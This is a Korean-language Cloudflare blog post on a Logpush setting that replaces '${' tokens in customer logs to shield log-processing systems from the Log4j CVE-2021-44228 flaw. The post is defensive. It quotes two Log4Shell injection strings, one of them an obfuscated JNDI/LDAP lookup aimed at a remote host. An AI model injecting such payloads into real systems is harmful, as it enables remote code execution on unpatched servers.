구독해서 새 게시물에 대한 알림을 받으세요.

Log4j 취약점으로부터 고객을 보호하기 위한 Cloudflare Logs 삭제

2021. 12. 14.

4분 읽기

2021년 12월 9일에 모두가 Apache Log4j 유틸리티에 영향을 주는 제로 데이 취약점 공격인 CVE-2021-44228에 대해 알게 되었습니다. Cloudflare에서는 이러한 취약점으로부터 보호하기 위해 즉시 당사의 WAF를 업데이트했지만 시스템을 최대한 빨리 업데이트하도록 고객에게 권장하고 있습니다.

다만 많은 수의 Cloudflare 고객이 Log4j를 사용하는 소프트웨어를 통해 자신의 로그를 사용하고 있음을 알기에 Cloudflare Logs를 통한 모든 취약점 공격 시도 또한 완화하고 있습니다. 이 글을 작성하는 시점에 당사가 고객에게 전송하는 로그에서 확인되는 취약점 공격 패턴은 초당 최대 1,000회입니다.

지금부터 고객은 자신의 Logpush 작업이 이 취약점을 트리거할 수 있는 토큰을 자동으로 삭제하도록 업데이트할 수 있습니다. 이에 대한 세부적인 내용은 당사의 개발자 문서나 아래 세부 정보에서 확인할 수 있습니다.

공격 방법

Log4j 취약점 작동 방법은 당사의 블로그 포스팅에서 확인할 수 있습니다. 요약하자면 공격자는 ${jndi:ldap://example.com/a}와 같은 것을 모든 문자열에 추가할 수 있습니다. 그 다음에 Log4j에서는 이 객체를 검색하기 위해 인터넷과 연결합니다.

Cloudflare Logs에는 사용자 에이전트나 URL 경로와 같이 공용 인터넷에서 최종 사용자가 제어하는 많은 수의 문자열 필드가 포함되어 있습니다. 이 취약점을 통해 악의적인 사용자는 이러한 필드를 읽고 패치되지 않은 Log4j 인스턴스를 사용하는 모든 시스템에서 원격 코드 실행을 유발할 수 있습니다.

당사의 완화 계획

안타깝게도 단순히 ${jndi:ldap와 같은 토큰을 확인하는 것은 이 취약점으로부터 보호하는 데 충분하지 않습니다. 템플릿 언어의 표현성으로 인해 난독화된 변형도 확인해야 합니다. 이미 외부에서 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}와 같은 변형을 사용하는 공격자가 있음을 확인했습니다. 그렇기에 ${ 토큰을 삭제하는 것은 이 취약점으로부터 보호하는 가장 일반적인 방법입니다.

${ 토큰은 당사가 고객에게 전송하는 로그에서 초당 최대 1,000회 나타나고 있습니다. 일부 레코드의 무작위 검사에서 많은 수가 이 취약점을 공격하려는 시도가 아님을 보여줍니다. 따라서 이러한 토큰을 자신의 로그에서 보기를 기대하는 고객에게 영향을 미치지 않고 안전하게 당사의 로그를 삭제할 수 없습니다.

지금부터 고객은 자신의 Logpush 작업을 업데이트하여 ${ 문자열을 삭제하고 어디에서나 이를 x{으로 대체할 수 있습니다.

이를 활성화하려면 고객은 자신의 Logpush 작업 옵션 구성을 업데이트하여 CVE-2021-44228=true 파라미터를 포함시켜야 합니다. Logpush API 사용 방법에 대한 상세한 지침은 당사의 개발자 문서의 예시에서 확인하시기 바랍니다. 이 옵션은 현재 Cloudflare Dashboard에서 사용할 수 없으며 API를 사용해야만 변경 가능한 점 참고 부탁드립니다.

Twitter에서 의논하기 Hacker News에서 의논하기 Reddit에서 의논하기

로그 취약점 제로 데이 위협 보안 Log4J

Twitter에서 팔로우하기

Jon Levine |@jplevine

Cloudflare |Cloudflare

Cloudflare에서는 전체 기업 네트워크를 보호하고, 고객이 인터넷 규모의 애플리케이션을 효과적으로 구축하도록 지원하며, 웹 사이트와 인터넷 애플리케이션을 가속화하고, DDoS 공격을 막으며, 해커를 막고, Zero Trust로 향하는 고객의 여정을 지원합니다.

어떤 장치로든 1.1.1.1에 방문해 인터넷을 더 빠르고 안전하게 만들어 주는 Cloudflare의 무료 앱을 사용해 보세요.

더 나은 인터넷을 만들기 위한 Cloudflare의 사명을 자세히 알아보려면 여기에서 시작하세요. 새로운 커리어 경로를 찾고 있다면 채용 공고를 확인해 보세요.
Vulnerabilities (KO)Log4J (KO)Log4Shell (KO)한국어

X에서 팔로우하기

Jon Levine|@jplevine
Cloudflare|@cloudflare

관련 게시물

2024년 3월 14일 오후 12:30

Cloudflare AI 제품의 토큰 길이 부채널 공격 완화

Workers AI 및 AI Gateway 팀은 최근 공개 버그 바운티 프로그램을 통해 제출된 보고와 관련하여 Ben Gurion 대학교의 보안 연구진과 긴밀하게 협력했습니다. 이 과정을 통해 Cloudflare는 모든 LLM 공급자에게 영향을 미치는 취약점을 발견하고 완벽하게 패치를 적용했습니다. 그 이야기는 다음과 같습니다...

2024년 3월 06일 오후 2:00

Cloudflare One으로 VPN 취약성 제거하기

최근 미국 사이버보안 및 인프라 보안국(CISA)에서는 Ivanti Connect Secure 및 Policy Secure 취약성으로 인해 긴급 지침을 발표했습니다. 이 게시물에서는 이들 취약점을 악용하는 위협 행위자의 전술에 대해 설명합니다...

2024년 2월 29일 오후 2:00

새로운 DNSSEC 리소스 고갈 취약점 수정

Cloudflare에서는 최근 두 가지 치명적인 DNSSEC 취약점(CVE-2023-50387 및 CVE-2023-50868)을 수정했습니다. 이 두 취약점은 모두 유효성을 검사하는 DNS 확인자의 계산 리소스를 고갈시킬 수 있습니다. 이들 취약점은 Cloudflare의 권한 있는 DNS 또는 DNS 방화벽 제품에 영향을 미치지 않습니다...

2024년 1월 23일 오후 2:00

Cloudflare의 AI WAF가 Ivanti Connect Secure의 치명적인 zero-day 취약점을 선제적으로 감지한 방법

2024년 1월 17일, 그 두 가지 취약점을 구체적으로 다루는 긴급 규칙을 발표한 Cloudflare는 AI 모델을 활용하지 않는 고객이 이러한 위협에 대처하는 데 큰 도움이 되었습니다...